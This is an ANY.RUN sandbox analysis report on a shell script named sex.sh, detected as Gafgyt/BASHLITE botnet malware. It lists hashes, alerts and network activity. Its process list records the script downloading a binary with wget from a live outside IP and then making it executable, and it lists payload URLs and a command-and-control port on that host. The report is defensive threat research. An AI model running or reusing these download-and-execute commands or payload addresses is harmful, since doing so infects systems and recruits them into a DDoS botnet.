Malware analysis sex.sh Malicious activity | ANY.RUN

Add for printing

File name:	sex.sh
Full analysis:	https://app.any.run/tasks/b58d6214-c770-41db-8421-abc980da325c
Verdict:	Malicious activity
Threats:	A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet. Gafgyt, also known as BASHLITE, is a botnet affecting Internet of Things (IoT) devices and Linux-based systems. The malware aims to compromise and gain control of these devices, often by exploiting weak or default passwords, as well as known vulnerabilities. Gafgyt has been around since 2014 and has evolved into multiple variants, each with its own set of features and capabilities, including the ability to launch distributed denial of service (DDoS) attacks. Malware Trends Tracker >>>
Analysis date:	December 14, 2024, 15:02:00
OS:	Ubuntu 22.04.2 LTS
Tags:	ddos gafgyt bashlite botnet gafygt
Indicators:
MIME:	text/x-shellscript
File info:	Bourne-Again shell script, ASCII text executable
MD5:	255DECB3180BB0E03B43D0D6246C3977
SHA1:	C99637830A502BC731837ADFF300980A592E8316
SHA256:	2D718FDD5A61973C8C4C9BD4E7F40E5E424DD39D446597EFC4CB79889211F875
SSDEEP:	12:q0FK4V0FKi0FKCc43fX0FK7eekX0FKC0FKKX0FKve0FK4fX0FKS0FKvsl0FKYaM7:vP+Kpc4kqasi1s6bVsKysOfaFmcK5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Add for printing

MALICIOUS
- GAFGYT has been detected (SURICATA)
  - x86 (PID: 38772)
  - i686 (PID: 38785)
  - 586 (deleted) (PID: 38800)
- Connects to the CnC server
  - x86 (PID: 38772)
  - i686 (PID: 38785)
  - 586 (deleted) (PID: 38800)
SUSPICIOUS
- Potential Corporate Privacy Violation
  - wget (PID: 38757)
  - wget (PID: 38752)
  - wget (PID: 38762)
  - wget (PID: 38767)
  - wget (PID: 38774)
  - wget (PID: 38780)
  - wget (PID: 38799)
  - wget (PID: 38806)
  - wget (PID: 38814)
  - wget (PID: 38820)
  - wget (PID: 38787)
  - wget (PID: 38793)
- Connects to unusual port
  - x86 (PID: 38772)
  - i686 (PID: 38785)
  - 586 (deleted) (PID: 38800)
- Executes the "rm" command to delete files or directories
  - bash (PID: 38750)
- Executes commands using command-line interpreter
  - sudo (PID: 38749)
- Uses wget to download content
  - bash (PID: 38750)
- Modifies file or directory owner
  - sudo (PID: 38745)
INFO
No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.sh	\|	Linux/UNIX shell script (100)

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

282

Monitored processes

74

Malicious processes

12

Suspicious processes

4

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
38744	/bin/sh -c "sudo chown user /tmp/sex\.sh && chmod +x /tmp/sex\.sh && DISPLAY=:0 sudo -iu user /tmp/sex\.sh "	/usr/bin/dash	—	any-guest-agent
User: root Integrity Level: UNKNOWN Exit code: 0
38745	sudo chown user /tmp/sex.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38746	chown user /tmp/sex.sh	/usr/bin/chown	—	sudo
User: root Integrity Level: UNKNOWN Exit code: 0
38748	chmod +x /tmp/sex.sh	/usr/bin/chmod	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38749	sudo -iu user /tmp/sex.sh	/usr/bin/sudo	—	dash
User: root Integrity Level: UNKNOWN Exit code: 0
38750	/bin/bash /tmp/sex.sh	/usr/bin/bash	—	sudo
User: user Integrity Level: UNKNOWN Exit code: 0
38751	/usr/bin/locale-check C.UTF-8	/usr/bin/locale-check	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
38752	wget http://84.200.24.7/mips	/usr/bin/wget		bash
User: user Integrity Level: UNKNOWN Exit code: 0
38753	chmod +x mips	/usr/bin/chmod	—	bash
User: user Integrity Level: UNKNOWN Exit code: 0
38754	/bin/bash /tmp/sex.sh	/usr/bin/bash	—	bash
User: user Integrity Level: UNKNOWN Exit code: 32256

Add for printing

Executable files

0

Suspicious files

1

Text files

0

Unknown types

0

Dropped files

PID	Process	Filename		Type
38762	wget	/tmp/sh4 (deleted)		o
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

15

TCP/UDP connections

25

DNS requests

9

Threats

16

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	204	185.125.190.17:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
—	—	GET	204	185.125.190.17:80	http://connectivity-check.ubuntu.com/	unknown	—	—	whitelisted
38752	wget	GET	200	84.200.24.7:80	http://84.200.24.7/mips	unknown	—	—	malicious
38767	wget	GET	200	84.200.24.7:80	http://84.200.24.7/x86	unknown	—	—	malicious
38762	wget	GET	200	84.200.24.7:80	http://84.200.24.7/sh4	unknown	—	—	malicious
38757	wget	GET	200	84.200.24.7:80	http://84.200.24.7/mipsel	unknown	—	—	malicious
38780	wget	GET	200	84.200.24.7:80	http://84.200.24.7/i686	unknown	—	—	malicious
38793	wget	GET	200	84.200.24.7:80	http://84.200.24.7/586	unknown	—	—	malicious
38774	wget	GET	200	84.200.24.7:80	http://84.200.24.7/arm61	unknown	—	—	malicious
38814	wget	GET	200	84.200.24.7:80	http://84.200.24.7/dss	unknown	—	—	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	185.125.190.17:80	—	Canonical Group Limited	GB	unknown
484	avahi-daemon	224.0.0.251:5353	—	—	—	unknown
1178	snap-store	169.150.255.183:443	odrs.gnome.org	—	GB	whitelisted
38752	wget	84.200.24.7:80	—	diva-e Datacenters GmbH	DE	malicious
38757	wget	84.200.24.7:80	—	diva-e Datacenters GmbH	DE	malicious
38762	wget	84.200.24.7:80	—	diva-e Datacenters GmbH	DE	malicious
38767	wget	84.200.24.7:80	—	diva-e Datacenters GmbH	DE	malicious
38772	x86	84.200.24.7:666	—	diva-e Datacenters GmbH	DE	malicious
38774	wget	84.200.24.7:80	—	diva-e Datacenters GmbH	DE	malicious
512	snapd	185.125.188.54:443	api.snapcraft.io	Canonical Group Limited	GB	whitelisted

DNS requests

Domain	IP	Reputation
google.com	142.250.185.110 2a00:1450:4001:829::200e	whitelisted
odrs.gnome.org	169.150.255.183 212.102.56.179 37.19.194.80 195.181.175.41 195.181.170.18 2a02:6ea0:c700::101 2a02:6ea0:c700::11 2a02:6ea0:c700::21 2a02:6ea0:c700::112 2a02:6ea0:c700::19	whitelisted
api.snapcraft.io	185.125.188.54 185.125.188.59 185.125.188.58 185.125.188.55 2620:2d:4000:1010::42 2620:2d:4000:1010::6d 2620:2d:4000:1010::2e6 2620:2d:4000:1010::117	whitelisted
105.100.168.192.in-addr.arpa	—	unknown
connectivity-check.ubuntu.com	2001:67c:1562::24 2620:2d:4000:1::22 2620:2d:4000:1::23 2620:2d:4002:1::196 2620:2d:4000:1::98 2620:2d:4002:1::197 2620:2d:4000:1::97 2620:2d:4000:1::2b 2620:2d:4000:1::96 2620:2d:4000:1::2a 2001:67c:1562::23 2620:2d:4002:1::198	whitelisted

Threats

PID	Process	Class	Message
38752	wget	Misc Attack	ET COMPROMISED Known Compromised or Hostile Host Traffic group 23
38752	wget	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
38757	wget	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
38762	wget	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
38767	wget	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
38774	wget	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
38780	wget	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
38787	wget	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
38793	wget	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP
38799	wget	Potential Corporate Privacy Violation	ET POLICY Executable and linking format (ELF) file download Over HTTP

3 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

sex.sh

255DECB3180BB0E03B43D0D6246C3977

C99637830A502BC731837ADFF300980A592E8316

2D718FDD5A61973C8C4C9BD4E7F40E5E424DD39D446597EFC4CB79889211F875

12:q0FK4V0FKi0FKCc43fX0FK7eekX0FKC0FKKX0FKve0FK4fX0FKS0FKvsl0FKYaM7:vP+Kpc4kqasi1s6bVsKysOfaFmcK5

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

GAFGYT has been detected (SURICATA)

Connects to the CnC server

SUSPICIOUS

Potential Corporate Privacy Violation

Connects to unusual port

Executes the "rm" command to delete files or directories

Executes commands using command-line interpreter

Uses wget to download content

Modifies file or directory owner

INFO

Malware configuration

Static information

TRiD

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings